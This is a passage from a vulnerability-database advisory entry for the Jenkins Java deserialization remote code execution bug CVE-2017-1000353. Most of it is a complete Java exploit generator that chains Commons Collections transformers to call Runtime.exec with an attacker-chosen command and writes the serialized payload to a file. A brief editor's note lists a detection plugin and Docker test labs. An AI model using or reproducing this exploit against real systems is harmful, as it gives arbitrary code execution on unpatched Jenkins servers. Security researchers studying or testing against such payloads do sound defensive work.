org.apache.commons.collections.map.LazyMap; import org.apache.commons.collections.map.ReferenceMap; import org.apache.commons.collections.set.ListOrderedSet; public class Payload implements Serializable { private Serializable payload; public Payload(String cmd) throws Exception { this.payload = this.setup(cmd); } public Serializable setup(String cmd) throws Exception { final String[] execArgs = new String[] { cmd }; final Transformer[] transformers = new Transformer[] { new ConstantTransformer(Runtime.class), new InvokerTransformer("getMethod", new Class[] { String.class, Class[].class }, new Object[] { "getRuntime", new Class[0] }), new InvokerTransformer("invoke", new Class[] { Object.class, Object[].class }, new Object[] { null, new Object[0] }), new InvokerTransformer("exec", new Class[] { String.class }, execArgs), new ConstantTransformer(1) }; Transformer transformerChain = new ChainedTransformer(transformers); final Map innerMap = new HashMap(); final Map lazyMap = LazyMap.decorate(innerMap, transformerChain); TiedMapEntry entry = new TiedMapEntry(lazyMap, "foo"); HashSet map = new HashSet(1); map.add("foo"); Field f = null; try { f = HashSet.class.getDeclaredField("map"); } catch (NoSuchFieldException e) { f = HashSet.class.getDeclaredField("backingMap"); } f.setAccessible(true); HashMap innimpl = (HashMap) f.get(map); Field f2 = null; try { f2 = HashMap.class.getDeclaredField("table"); } catch (NoSuchFieldException e) { f2 = HashMap.class.getDeclaredField("elementData"); } f2.setAccessible(true); Object[] array2 = (Object[]) f2.get(innimpl); Object node = array2[0]; if (node == null) { node = array2[1]; } Field keyField = null; try { keyField = node.getClass().getDeclaredField("key"); } catch (Exception e) { keyField = Class.forName("java.util.MapEntry").getDeclaredField( "key"); } keyField.setAccessible(true); keyField.set(node, entry); KeyPairGenerator keyPairGenerator = KeyPairGenerator.getInstance("DSA"); keyPairGenerator.initialize(1024); KeyPair keyPair = keyPairGenerator.genKeyPair(); PrivateKey privateKey = keyPair.getPrivate(); PublicKey publicKey = keyPair.getPublic(); Signature signature = Signature.getInstance(privateKey.getAlgorithm()); SignedObject payload = new SignedObject(map, privateKey, signature); JSONArray array = new JSONArray(); array.add("asdf"); ListOrderedSet set = new ListOrderedSet(); Field f1 = AbstractCollectionDecorator.class .getDeclaredField("collection"); f1.setAccessible(true); f1.set(set, array); DummyComperator comp = new DummyComperator(); ConcurrentSkipListSet csls = new ConcurrentSkipListSet(comp); csls.add(payload); CopyOnWriteArraySet a1 = new CopyOnWriteArraySet(); CopyOnWriteArraySet a2 = new CopyOnWriteArraySet(); a1.add(set); Container c = new Container(csls); a1.add(c); a2.add(csls); a2.add(set); ReferenceMap flat3map = new ReferenceMap(); flat3map.put(new Container(a1), "asdf"); flat3map.put(new Container(a2), "asdf"); return flat3map; } private Object writeReplace() throws ObjectStreamException { return this.payload; } static class Container implements Serializable { private Object o; public Container(Object o) { this.o = o; } private Object writeReplace() throws ObjectStreamException { return o; } } static class DummyComperator implements Comparator, Serializable { public int compare(Object arg0, Object arg1) { // TODO Auto-generated method stub return 0; } private Object writeReplace() throws ObjectStreamException { return null; } } public static void main(String args[]) throws Exception{ if(args.length != 2){ System.out.println("java -jar payload.jar outfile cmd"); System.exit(0); } String cmd = args[1]; FileOutputStream out = new FileOutputStream(args[0]); Payload pwn = new Payload(cmd); ObjectOutputStream oos = new ObjectOutputStream(out); oos.writeObject(pwn); oos.flush(); out.flush(); } } ``` #### **编者注** 目前国内安全社区已经提供了该漏洞的检测插件(巡风 https://github.com/ysrc/xunfeng/ ) ,和基于 `Docker` 的漏洞测试环境 * https://github.com/Medicean/VulApps * https://github.com/phith0n/vulhub
idSSV:93062
last seen2017-11-19
modified2017-04-28
published2017-04-28
reporterRoot
titleJenkins Java Deserialization Remote Code Execution Vulnerability (CVE-2017-1000353)